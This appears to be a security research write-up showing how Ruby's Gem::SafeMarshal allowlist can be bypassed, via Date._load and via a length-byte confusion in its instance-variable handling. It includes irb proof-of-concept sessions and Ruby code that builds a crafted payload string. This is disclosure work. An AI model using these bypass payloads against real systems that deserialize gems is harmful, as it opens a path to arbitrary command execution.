In September 2023, Ruby added Gem::SafeMarshal in an attempt to make deserialization while processing packaged library .gem files safer. I decided to learn how it works and take on the challenge of breaking it to execute arbitrary commands.
Gem::SafeMarshal
.gem
Gem::SafeMarshal can be loaded by requiring rubygems/safe_marshal or calling Gem.load_safe_marshal. Gem::SafeMarshal defines two methods, safe_load and load. With the load method you specify which classes, symbols and instance variables are permitted, whereas the safe_load method has a hardcoded list of what is permitted.
rubygems/safe_marshal
Gem.load_safe_marshal
safe_load
load
irb(main):001:0> Gem.load_safe_marshal => true irb(main):002:0> class Foo; end => nil irb(main):003:0> serialized_foo = Marshal.dump(Foo.new) => "\x04\bo:\bFoo\x00" irb(main):004:0> Gem::SafeMarshal.safe_load(serialized_foo) /usr/local/lib/ruby/3.4.0+0/rubygems/safe_marshal/visitors/to_ruby.rb:277:in 'Gem::SafeMarshal::Visitors::ToRuby#resolve_class': Attempting to load unpe rmitted class "Foo" @ root.object (Gem::SafeMarshal::Visitors::ToRuby::Unper mittedClassError) irb(main):005:0> Gem::SafeMarshal.load(serialized_foo) /usr/local/lib/ruby/3.4.0+0/rubygems/safe_marshal/visitors/to_ruby.rb:277:in 'Gem::SafeMarshal::Visitors::ToRuby#resolve_class': Attempting to load unpe rmitted class "Foo" @ root.object (Gem::SafeMarshal::Visitors::ToRuby::Unper mittedClassError) irb(main):006:0> Gem::SafeMarshal.load(serialized_foo, permitted_classes: ["Foo"] ) => #<Foo:0x00007f149ec54a90>
It wasn't obvious to me how SafeMarshal could be easily implemented as Marshal does not expose any means to restrict which classes can be deserialized, as opposed to Java which has method overriding of resolveClass on a subclass of java.io.ObjectInputStream. It turns out that the answer is that it wasn't easy and was achieved by creating a partial reimplementation of Marshal in pure Ruby.
SafeMarshal
Marshal
resolveClass
java.io.ObjectInputStream
The first thing I checked was if the lists of what is permitted by Gem::SafeMarshal.safe_load is overly permissive. The lists can be found in lib/rubygems/safe_marshal.rb and are shown below:
Gem::SafeMarshal.safe_load
lib/rubygems/safe_marshal.rb
module Gem module SafeMarshal PERMITTED_CLASSES = %w[ Date Time Rational Gem::Dependency Gem::NameTuple Gem::Platform Gem::Requirement Gem::Specification Gem::Version Gem::Version::Requirement YAML::Syck::DefaultKey YAML::PrivateType ].freeze PERMITTED_SYMBOLS = %w[ development runtime name number platform dependencies ].freeze PERMITTED_IVARS = { "String" => %w[E encoding @taguri @debug_created_info], "Time" => %w[ offset zone nano_num nano_den submicro @_zone @marshal_with_utc_coercion ], "Gem::Dependency" => %w[ @name @requirement @prerelease @version_requirement @version_requirements @type @force_ruby_platform ], "Gem::NameTuple" => %w[@name @version @platform], "Gem::Platform" => %w[@os @cpu @version], "Psych::PrivateType" => %w[@value @type_id], }.freeze
At first glance, the lists of what is permitted seemed appropriately limited and plausibly contained only essential items. The list of permitted classes being so short meant I decided to work systematically through every class, starting at the top with the Date class.
Date
I found the Date class implemented with C in the file ext/date/date_core.c.
ext/date/date_core.c
static VALUE cDate, cDateTime; void Init_date_core(void) { [...] cDate = rb_define_class("Date", rb_cObject); [...] rb_define_method(cDate, "marshal_dump", d_lite_marshal_dump, 0); rb_define_method(cDate, "marshal_load", d_lite_marshal_load, 1); rb_define_singleton_method(cDate, "_load", date_s__load, 1);
I started with the marshal_load method as it is invoked during deserialization and is the common start of deserialization gadget chains. The marshal_load method was not too interesting, mostly data validation followed by stuffing values into an internal C struct. However, the next method, _load, which can also be invoked during deserialization, was much more interesting.
marshal_load
_load
static VALUE date_s__load(VALUE klass, VALUE s) { VALUE a, obj; a = rb_marshal_load(s); obj = d_lite_s_alloc(klass); return d_lite_marshal_load(obj, a); }
The _load method calls the C function rb_marshal_load, equivalent to Marshal.load in Ruby, with a value under our control. This means we can use a serialized Date object to obtain an arbitrary Marshal deserialization primitive. We can use this to move from Gem::SafeMarshal deserialization with restricted classes to Marshal deserialization with unrestricted classes. From Marshal, we can use a deserialization gadget chain to achieve arbitrary command execution.
rb_marshal_load
Marshal.load
irb(main):001> require "date" => true irb(main):002> Gem.load_safe_marshal => true irb(main):003* class Foo irb(main):004* def marshal_dump; end irb(main):005* def marshal_load(*) irb(main):006* abort "You win - Foo#marshal_load was called" irb(main):007* end irb(main):008> end => :marshal_load irb(main):009* class Date irb(main):010* undef_method :marshal_dump irb(main):011* def _dump(_depth) irb(main):012* Marshal.dump(Foo.new) irb(main):013* end irb(main):014> end => :_dump irb(main):015> Gem::SafeMarshal.safe_load(Marshal.dump(Date.new)) You win - Foo#marshal_load was called
Instead of auditing more permitted classes, I moved onto reading source code of Gem::SafeMarshal. I came across some incredibly suspicious looking code within the instance variable handling. The code generates a serialized string using string concatenation including attacker controlled data. The serialized string is then passed to the real Marshal.load.
def visit_Gem_SafeMarshal_Elements_WithIvars(e) [...] marshal_string = "\x04\bIu:\tTime".b marshal_string.concat(s.size + 5) marshal_string << s marshal_string.concat(internal.size + 5) internal.each do |k, v| marshal_string.concat(":") marshal_string.concat(k.size + 5) marshal_string.concat(k.to_s) dumped = Marshal.dump(v) dumped[0, 2] = "" marshal_string.concat(dumped) end object = @objects[object_offset] = Marshal.load(marshal_string) [...]
We control the value stored in the variable s in the above visit_Gem_SafeMarshal_Elements_WithIvars code. By supplying a string of size 0xf6, when 5 is added, the value will then be 0xfb, which Marshal will interpret as length 0 but our full s value is still concatenated.
s
visit_Gem_SafeMarshal_Elements_WithIvars
0xf6
5
0xfb
0
This works because the Marshal format has various single byte encodings of the integer 0, as shown below, which is unaccounted for by Gem::SafeMarshal.
irb(main):001:0> Marshal.dump(0) => "\x04\bi\x00" irb(main):002:0> Marshal.load("\x04\bi\x00") => 0 irb(main):003:0> Marshal.load("\x04\bi\x05") => 0 irb(main):004:0> Marshal.load("\x04\bi\xfb") => 0
Now we have to work out what Marshal is expecting and how to craft one of those, and hope it has an impact to security.
It turns out Marshal is in the state ready to receive instance variables. First it needs to know how many instance variables to expect, I chose 1, then a name, I chose :zone, then a value. The value can be an arbitrary serialized object, thereby achieving deserialization with unrestricted classes once again. Here we can use a deserialization gadget chain to achieve arbitrary command execution (just be careful of the 240 or so byte limit).
1
:zone
irb(main):001* class Foo irb(main):002* def marshal_load(*) irb(main):003* abort "You win - Foo#marshal_load was called" irb(main):004* end irb(main):005> end => :marshal_load irb(main):006> Gem.load_safe_marshal => true irb(main):007* Gem::SafeMarshal.safe_load( irb(main):008* "\x04\bIu:\tTime\x01\xF6\x06:\tzoneU:\bFoo0" + ("\x00" * 233) irb(main):009> ) You win - Foo#marshal_load was called
The payload was generated using the following code:
class Foo def marshal_dump end end payload = "#{Marshal::MAJOR_VERSION.chr}#{Marshal::MINOR_VERSION.chr}" + "I" + # TYPE_IVAR "u" + # TYPE_USERDEF Marshal.dump(:Time)[2..-1] + Marshal.dump(0xfb - 5)[3..-1] + Marshal.dump(1)[3..-1] + Marshal.dump(:zone)[2..-1] + Marshal.dump(Foo.new)[2..-1] + ("\x00" * 233) puts payload.inspect